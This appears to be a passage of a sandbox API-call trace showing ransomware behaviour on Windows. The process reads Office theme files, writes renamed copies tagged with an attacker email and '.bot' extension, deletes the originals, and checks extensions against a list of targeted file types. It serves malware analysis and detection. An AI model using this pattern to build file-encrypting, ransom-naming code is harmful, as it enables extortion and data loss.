	[0142.062] GetLastError () returned 0x0
	[0142.062] ReadFile (in: hFile=0x3b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xa95d, lpOverlapped=0x0) returned 1
	[0142.096] WriteFile (in: hFile=0x398, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xa960, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xa960, lpOverlapped=0x0) returned 1
	[0142.098] ReadFile (in: hFile=0x3b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.098] WriteFile (in: hFile=0x398, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0142.098] SetEndOfFile (hFile=0x398) returned 1
	[0142.098] CloseHandle (hObject=0x398) returned 1
	[0142.098] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.098] SetEndOfFile (hFile=0x3b4) returned 1
	[0142.101] CloseHandle (hObject=0x3b4) returned 1
	[0142.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.120] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx")) returned 1
	[0142.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.121] lstrlenW (lpString=".doc") returned 4
	[0142.121] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString=".docx") returned 5
	[0142.121] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.121] lstrlenW (lpString=".pdf") returned 4
	[0142.121] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString=".xls") returned 4
	[0142.121] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString=".xlsx") returned 5
	[0142.121] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.121] lstrlenW (lpString=".ppt") returned 4
	[0142.121] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.121] lstrlenW (lpString=".zip") returned 4
	[0142.121] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString=".rar") returned 4
	[0142.121] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString=".bz2") returned 4
	[0142.121] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString=".7z") returned 3
	[0142.121] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.121] lstrlenW (lpString=".dbf") returned 4
	[0142.121] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.121] lstrlenW (lpString=".1cd") returned 4
	[0142.121] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.122] lstrlenW (lpString=".jpg") returned 4
	[0142.122] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.122] lstrlenW (lpString=".doc") returned 4
	[0142.122] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString=".docx") returned 5
	[0142.122] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.122] lstrlenW (lpString=".pdf") returned 4
	[0142.122] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString=".xls") returned 4
	[0142.122] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString=".xlsx") returned 5
	[0142.122] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.122] lstrlenW (lpString=".ppt") returned 4
	[0142.122] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.122] lstrlenW (lpString=".zip") returned 4
	[0142.122] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString=".rar") returned 4
	[0142.122] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString=".bz2") returned 4
	[0142.122] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString=".7z") returned 3
	[0142.122] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.122] lstrlenW (lpString=".dbf") returned 4
	[0142.122] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.122] lstrlenW (lpString=".1cd") returned 4
	[0142.122] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx") returned 78
	[0142.123] lstrlenW (lpString=".jpg") returned 4
	[0142.123] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.123] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.123] lstrlenW (lpString="Origin.eftx") returned 11
	[0142.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.128] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=40941) returned 1
	[0142.128] CloseHandle (hObject=0x3a0) returned 1
	[0142.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx")) returned 0x20
	[0142.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.129] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.129] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.129] GetLastError () returned 0x0
	[0142.129] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x9fed, lpOverlapped=0x0) returned 1
	[0142.132] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x9ff0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x9ff0, lpOverlapped=0x0) returned 1
	[0142.133] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.133] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0142.133] SetEndOfFile (hFile=0x3b4) returned 1
	[0142.133] CloseHandle (hObject=0x3b4) returned 1
	[0142.134] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.134] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.136] CloseHandle (hObject=0x3a0) returned 1
	[0142.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.136] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx")) returned 1
	[0142.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.137] lstrlenW (lpString=".doc") returned 4
	[0142.137] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.137] lstrlenW (lpString=".docx") returned 5
	[0142.137] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.137] lstrlenW (lpString=".pdf") returned 4
	[0142.137] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.137] lstrlenW (lpString=".xls") returned 4
	[0142.137] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.137] lstrlenW (lpString=".xlsx") returned 5
	[0142.137] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.137] lstrlenW (lpString=".ppt") returned 4
	[0142.137] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.137] lstrlenW (lpString=".zip") returned 4
	[0142.137] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.137] lstrlenW (lpString=".rar") returned 4
	[0142.137] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.137] lstrlenW (lpString=".bz2") returned 4
	[0142.137] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.137] lstrlenW (lpString=".7z") returned 3
	[0142.137] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.137] lstrlenW (lpString=".dbf") returned 4
	[0142.138] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.138] lstrlenW (lpString=".1cd") returned 4
	[0142.138] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.138] lstrlenW (lpString=".jpg") returned 4
	[0142.138] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.138] lstrlenW (lpString=".doc") returned 4
	[0142.138] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString=".docx") returned 5
	[0142.138] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.138] lstrlenW (lpString=".pdf") returned 4
	[0142.138] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString=".xls") returned 4
	[0142.138] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString=".xlsx") returned 5
	[0142.138] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.138] lstrlenW (lpString=".ppt") returned 4
	[0142.138] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.138] lstrlenW (lpString=".zip") returned 4
	[0142.138] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString=".rar") returned 4
	[0142.138] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString=".bz2") returned 4
	[0142.138] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.138] lstrlenW (lpString=".7z") returned 3
	[0142.138] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.138] lstrlenW (lpString=".dbf") returned 4
	[0142.138] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.139] lstrlenW (lpString=".1cd") returned 4
	[0142.139] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78
	[0142.139] lstrlenW (lpString=".jpg") returned 4
	[0142.139] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.139] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.139] lstrlenW (lpString="Perspective.eftx") returned 16
	[0142.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.140] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=21423) returned 1
	[0142.140] CloseHandle (hObject=0x3a0) returned 1
	[0142.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 0x20
	[0142.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.140] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.141] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.141] GetLastError () returned 0x0
	[0142.141] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x53af, lpOverlapped=0x0) returned 1
	[0142.143] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x53b0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x53b0, lpOverlapped=0x0) returned 1
	[0142.144] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.145] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0142.145] SetEndOfFile (hFile=0x3b4) returned 1
	[0142.145] CloseHandle (hObject=0x3b4) returned 1
	[0142.145] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.145] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.147] CloseHandle (hObject=0x3a0) returned 1
	[0142.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 1
	[0142.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.148] lstrlenW (lpString=".doc") returned 4
	[0142.148] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.148] lstrlenW (lpString=".docx") returned 5
	[0142.148] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.148] lstrlenW (lpString=".pdf") returned 4
	[0142.148] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.148] lstrlenW (lpString=".xls") returned 4
	[0142.148] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.148] lstrlenW (lpString=".xlsx") returned 5
	[0142.148] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.148] lstrlenW (lpString=".ppt") returned 4
	[0142.148] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.148] lstrlenW (lpString=".zip") returned 4
	[0142.148] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.148] lstrlenW (lpString=".rar") returned 4
	[0142.148] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.148] lstrlenW (lpString=".bz2") returned 4
	[0142.148] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString=".7z") returned 3
	[0142.149] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.149] lstrlenW (lpString=".dbf") returned 4
	[0142.149] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.149] lstrlenW (lpString=".1cd") returned 4
	[0142.149] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.149] lstrlenW (lpString=".jpg") returned 4
	[0142.149] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.149] lstrlenW (lpString=".doc") returned 4
	[0142.149] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString=".docx") returned 5
	[0142.149] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.149] lstrlenW (lpString=".pdf") returned 4
	[0142.149] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString=".xls") returned 4
	[0142.149] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString=".xlsx") returned 5
	[0142.149] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.149] lstrlenW (lpString=".ppt") returned 4
	[0142.149] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.149] lstrlenW (lpString=".zip") returned 4
	[0142.149] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString=".rar") returned 4
	[0142.149] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString=".bz2") returned 4
	[0142.149] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.149] lstrlenW (lpString=".7z") returned 3
	[0142.150] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.150] lstrlenW (lpString=".dbf") returned 4
	[0142.150] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.150] lstrlenW (lpString=".1cd") returned 4
	[0142.150] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83
	[0142.150] lstrlenW (lpString=".jpg") returned 4
	[0142.150] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.150] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.150] lstrlenW (lpString="Pushpin.eftx") returned 12
	[0142.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.151] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=782121) returned 1
	[0142.151] CloseHandle (hObject=0x3a0) returned 1
	[0142.151] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx")) returned 0x20
	[0142.151] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.152] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.152] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.152] GetLastError () returned 0x0
	[0142.152] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbef29, lpOverlapped=0x0) returned 1
